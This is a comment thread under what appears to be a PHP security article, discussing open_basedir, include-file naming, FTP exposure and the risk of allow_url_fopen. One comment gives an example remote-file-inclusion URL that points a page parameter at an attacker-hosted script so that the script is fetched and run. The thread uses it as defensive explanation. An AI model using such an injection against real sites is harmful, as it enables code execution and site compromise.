DISQUS

Matt Thornton · 4 years ago

Ah yes open_basedir(), figured you'd mention that. Nice idea to use file_exists to check a file before including it. I s'pose there's lot of stuff you could do, like checking the $_SERVER["DOCUMENT_ROOT"] or the HOSTNAME to check the file is coming from itself.



Are you gonna do anything on FTP security? Not being much of a security buff myself, but thinking about it, were someone able to gain FTP access (don't know but with register_globals on, could you pass a system command through a $_GET equiv, or guest accounts/public_ftp etc.) then they could upload whatever they wanted and have away with your system.



And you might want to mention for the more n00b programmers out there to give all includes a .php extension (and not a .inc, for example ;) :p).



Matt

Aaron · 4 years ago

Hey Matt,

Checking $_SERVER[’DOCUMENT_ROOT’] will not work because that global variable will be set according to the page doing the including, not the remote file itself. And yes, FTP will be a topic. :)



Leave a Comment

Robert Mathews · 4 years ago

Here's a simple example of why allow_url_fopen is a problem in the real world.



I've seen several cases where people wrote a PHP script designed to display a bunch of content on a page with a fixed header and footer. They write it something like this:







And then they run it with something like "http://www.example.com/index.php?page=page5.html".



All it takes is someone to come along and type "http://www.example.com/index.php?page=http://evildoer.com/evilscript.txt", and if allow_url_fopen is turned on, PHP will happily run any PHP code contained in evilscript.txt. It could delete all your files, deface your site, attack other servers... whatever.



Moral: allow_url_fopen should *always* be off unless you need it.



Rob